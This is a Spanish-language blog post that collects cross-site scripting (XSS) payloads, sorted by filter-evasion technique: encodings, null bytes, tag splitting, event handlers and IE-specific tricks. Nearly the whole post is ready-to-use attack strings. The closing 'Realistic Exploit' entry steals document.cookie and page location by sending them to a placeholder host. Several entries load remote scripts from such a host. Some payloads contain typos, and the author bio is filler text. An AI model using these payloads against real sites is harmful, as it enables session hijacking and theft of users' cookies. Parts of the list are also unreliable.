Cross Site Scripting | Recopilacion de Payloads

junio 04, 2020

Recopilacion de Paylodas

xss vulnerabilidad cross site scripting payloads


Payloads para explotar la vulnerabilidad XSS (Cross Site Scripting)

Básico
##<script>alert(1234)</script>##1
##<script>prompt(1234)</script>##1
##<ScripT>alert(1234)</ScRipT>##1
##/<script>alert(1234)</script>##0
##<script>var m=<html><a href="//host">link</a>##1

Payload sin el TAG <script>
##<img+src="http://localhost">##1
##<DIV+STYLE="background-image: url(javascript:alert(1))">##1
##<IMG+DYNSRC="javascript:alert(1);">##1
##<IMG+LOWSRC="javascript:alert(1);">##1
##<isindex+type=image+src=1+onerror=alert(1)>##1
##<meta style="xss:expression(open(alert(1)))" />##1
##<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(1);\">##1
##<!</textarea <body onload='alert(1)'>##1
##<img+<iframe ="1" onerror="alert(1)">##1
##<iframe src="http://localhost"></iframe>##1
##<base+href="javascript:alert(1);//">##1
##<bgsound+src="javascript:alert(1);">##1
##<INPUT+TYPE="IMAGE"+SRC="javascript:alert(1);">##1
##<object+data="javascript:alert(0)">##1
##<STYLE>li+{list-style-image:url("javascript:alert(1)");}</STYLE><UL><LI>1##1
##<Layer+src="http://localhost">##1
##%3E%3Cbody%20onload=javascript:alert(1)%3E##1
##'">><marquee><h1>1</h1></marquee>##1
##</br style=a:expression(alert(1))>##1
##<font style='color:expression(alert(1))'>##1
##<embed src="data:image/svg+xml;>##1
##<frameset><frame src="xss"></frameset>##1
##<link href="http://host/xss.css">##1
##="/>%3ciframe%20src%3djavascript%3aalert%283%29%3e##1
##<object><param name="src" value="javascript:alert(0)"></param></object>##1
##<isindex action=javascript:alert(1) type=image>##1
##<b/alt="1"onmouseover=InputBox+1 language=vbs>test</b>##1
##</a onmousemove="alert(1)">##1
##'%26%26'javascript:alert%25281%2529//##1

Without Brackets
##"+onmouseover="window.location='http://localhost'##1
##"+onkeypress="prompt(23)"+##1
##"+onfocus="prompt(1)"+##1
##500);alert(1);//##1
##alert(document['cookie'])##1
##with(document)alert(cookie)##1
##";location=location.hash)//#0={};alert(0)##1
##//";alert(String.fromCharCode(88,83,83))##1
##%F6%3Cimg+onmouseover=prompt(/test/)//%F6%3E##1
##"+onDblClick=prompt(123)"+##1
##"+onError=prompt(123)"+##1
##"+onReset=prompt(123)"+##1
Payloand XSS en JavaScript
##javascript:propmpt(1)##1
##javascript:eval(unescape(location.href))##1
##a="get";b="URL";c="javascript:";d="alert(1);";eval(a+b+c+d);##1
##location=location.hash.slice(1);##1
##";location=location.hash)//#0={};alert(0)##1
##location=location.hash##1
##""+{toString:alert}##1
##""+{valueOf:alert}##1
##";eval(unescape(location))//# %0Aalert(0)##1
##;location.href='http://site';//##1

XSS - With NewLine
##%";eval(unescape(location))//#%0Aprompt(0)##1
##<SCRIPT>a=/XSS/%0Aalert(a.source)</SCRIPT>##1
##%'});%0aalert(1);%20//##1

XSS - With NewLine and Comment
##<script>//>%0Aalert(1);</script>##1

XSS - Null Byte Injected
##<script%00>alert(1)</script%00>##1
##<scr%00ipt>prompt(1)</sc%00ript>##1
##<scr\0ipt>prompt(1)</sc\0ript>##1
##%00"><script>alert(1)</script>##1

XSS - Null Byte in Script Tags
##%3Cscript%3Ealert(1)%3C/script%00TESTTEST%3E##1
 
XSS - With Encoded NewLine
##<IMG+SRC="jav&#x0A;ascript:alert(1);">##1

XSS - With Carriage Return
##<IMG+SRC="jav%0dascript:alert(1);">##1

With Encoded Carriage Return
##<IMG+SRC="jav#x0D;ascript:alert(1);">##1

Con Tab
##<IMG+SRC="jav%09ascript:alert(1);">##1

with Encoded Tab
##<IMG+SRC="jav&#x09;ascript:alert(1);">##1

Concatenacion
##document.write("<scr"+"ipt language=javascript src=http://localhost/></scr"+"ipt>");##1

Desarrollador BlackList
##<scr<script>ipt>prompt(document.cookie)</scr</script>ipt>##1

XSS - basic XSS as parameter name
##12&<script>alert(123)</script>=123##1

XSS - with eval
##<img src=x:alert(alt) onerror=eval(src) alt=0>##1

XSS - Jquery
##<img src=/ onerror=alert(1)>##1

XSS - with eval
##a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);##1

XSS - No white space for IE
##<img/src="xss.png"alt="xss">##1

XSS - Mocha
##<IMG SRC="mocha:[code]">##1

XSS - XHTML
##<x:scriptxmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>##1

XSS - Remote style sheet
##<STYLE>@import'http://host/css';</STYLE>##1

XSS - Special XSS
##<SCRIPT+a=">'>"SRC="http://localhost"></SCRIPT>##1

XSS - Bypass for Custom Filters
##<scr<script>ipt>alert('XSS')</scr</script>ipt>##1

XSS - URL Encoded
##%3Cscript%3Ealert(1)%3C/script%3E##1

XSS - Null Byte Injected
##foo%00<script>alert(document.cookie)</script>##1

XSS - Developer filter bypass
##"><<script>alert(document.cookie);//<</script>##1

XSS - Concatination
##><s"%2b"cript>alert(document.cookie)</s"%2B"cript>##1

XSS - Extra URL Encoded
##3Cscript%3Ealert(1)%3C%2Fscript%3E##1

XSS - Double URL EncodedS
##%253Cscript%253Ealert(1)%253C/script%253E##1

XSS - Full URL Encoded
##%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e##1

XSS - Ascii Encoded
##%BCscript%BEalert(%A21%A2)%BC/script%BE##1

XSS - Overlong UTF
##%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE##1

XSS - Base64 Encoded
##<object+data="data:text/html base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>##1

XSS - Base64 Encoded
##<a
  HREF="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==">ugh</a>##1

XSS - Full Base64 Encoded
##PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==##1

XSS - HTML Encoded
##<a+href="javas&#99;ript&#35;alert(1);">##1

XSS - UTF-8 Encoded
##<IMG+SRC=j&#X41vascript:alert(1)>##1

XSS - UTF-8 Encoded
##<IMG+SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#39;&#41;>##1

XSS - With uncommon event handler
##<INPUT+TYPE="checkbox"+onDblClick=confirm(XSS)>##1

XSS - With uncommon event handler
##<APPLET+CODE=""+CODEBASE="http://url/xss">##1
 
XSS - Overlong UTF
##%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE##1

XSS - Long UTF-8 Encoded
##<IMG+SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000039&#0000041>##1

XSS - %U Encoded
##%u0022%u003e%u003cscript%u003ealert%u0028%u0027Hello%u0027%u0029%u003c%u002fscript%u003e##1

XSS - UTF-7 Encoded
##+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-##1

XSS - Without quotes
##<SCRIPT>alert(String.fromCharCode(88))</SCRIPT>##1

XSS - HTML Entity Encoding
##&lt;script&gt;prompt(&apos;1&apos;)&lt;/script&gt;##1

XSS - Hex Entity Encoding
##&#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x78;&#x73;&#x73;&#x27;&#x29;&#x3c;&#x2f;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;##1

XSS - Decimal Entity Encoding
##&#x60;&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;&#x97;&#x108;&#x101;&#x114;&#x116;&#x40;&#x39;&#x120;&#x115;&#x115;&#x39;&#x41;&#x60;&#x47;&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;##1

XSS - Octal Entity Encoding
##&#x74;&#x163;&#x143;&#x162;&#x151;&#x160;&#x164;&#x76;&#x141;&#x154;&#x145;&#x162;&#x164;&#x50;&#x47;&#x170;&#x163;&#x163;&#x47;&#x51;&#x74;&#x57;&#x163;&#x143;&#x162;&#x151;&#x160;&#x164;&#x76;##1

XSS - Url Encoded HTML Entity
##=<img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert%26%23x28;1%26%23x29;>##1

XSS - With Expression for IE
##"+style%3d"x%3aexpression(alert(1))+##1

XSS - Escaping escapes
##\";alert(1);//##1

XSS - Eating Chars
##<img src="x:%90" title="onerror=alert(1)//">##1

XSS - FormFeed Injected for IE
##%3Cscript%0Caaaaa%3Ealert%2812%29%3C/script%0Caaaaa%3E##1

XSS - FormFeed Injected for Firefox
##<script%0Caaaaa>alert(123)</script>##1

XSS - Vertical-tab Injected for IE
##%3Cscript%0Baaa%3Ealert%28%29%3C/script%0Baaaa%3E##1

XSS - Vertical-tab Injected for Firefox
##%3Cscript%0Baaa%3Ealert%281%29%3C/script%3E##1

XSS - With star
##<*script>prompt(123)<*/script>##1

XSS - Carriage Return Injected
##<script%0Daaa>alert(1)</script%0Daaaa>##1

XSS - Space Insertion
##<script%20TEST>alert(1)</script%20TESTTEST>##1

XSS - Non Alpha/Non Digit
##<SCRIPT/XSSSRC="http://host"></SCRIPT>##1

XSS - No Closing Script Tag
##<SCRIPT+SRC=http://host/##1

XSS - With Extra Brackets
##<<SCRIPT>alert(1);//<</SCRIPT>##1

XSS - Half-Width/Full-Width Characters
##<script>prompt(1)</script>##1

Half-Width/Full-Width Unicode -1
##\uff1c\uff53\uff43\uff52\uff49\uff50\uff54\uff1e\uff41\uff4c\uff45\uff52\uff54\uff08\uff07\uff58\uff53\uff53\uff07\uff09\uff1c\uff0f\uff53\uff43\uff52\uff49\uff50\uff54\uff1e##1

Half-Width/Full-Width Unicode -2
##%uff1c%uff53%uff43%uff52%uff49%uff50%uff54%uff1e%uff41%uff4c%uff45%uff52%uff54%uff08%uff07%uff58%uff53%uff53%uff07%uff09%uff1c%uff0f%uff53%uff43%uff52%uff49%uff50%uff54%uff1e##1

Ful width %u encoding
##%uff1cscript%uff1ealert(1234)%uff1c/script%uff1e##1

As a parametername
##1&"><script>alert(1)</script>=1##1

Custom Filter
##</scr</script>ipt><ifr<iframeame/onload=prompt()>whs##1

Realistic Exploit
##%3E%3Cbody%20onload=javascript:alert(1)# var sc=escape(document.cookie);var d=escape(document.location);var mI=new Image();mI.src="http://host?a="+d+"&b="+ sc;##1
,
By:
INTELMEX
INTELMEX

This is a short biography of the post author. Maecenas nec odio et ante tincidunt tempus donec vitae sapien ut libero venenatis faucibus nullam quis ante maecenas nec odio et ante tincidunt tempus donec.

No hay comentarios.:

Publicar un comentario

Suscribirse a: Comentarios de la entrada (Atom)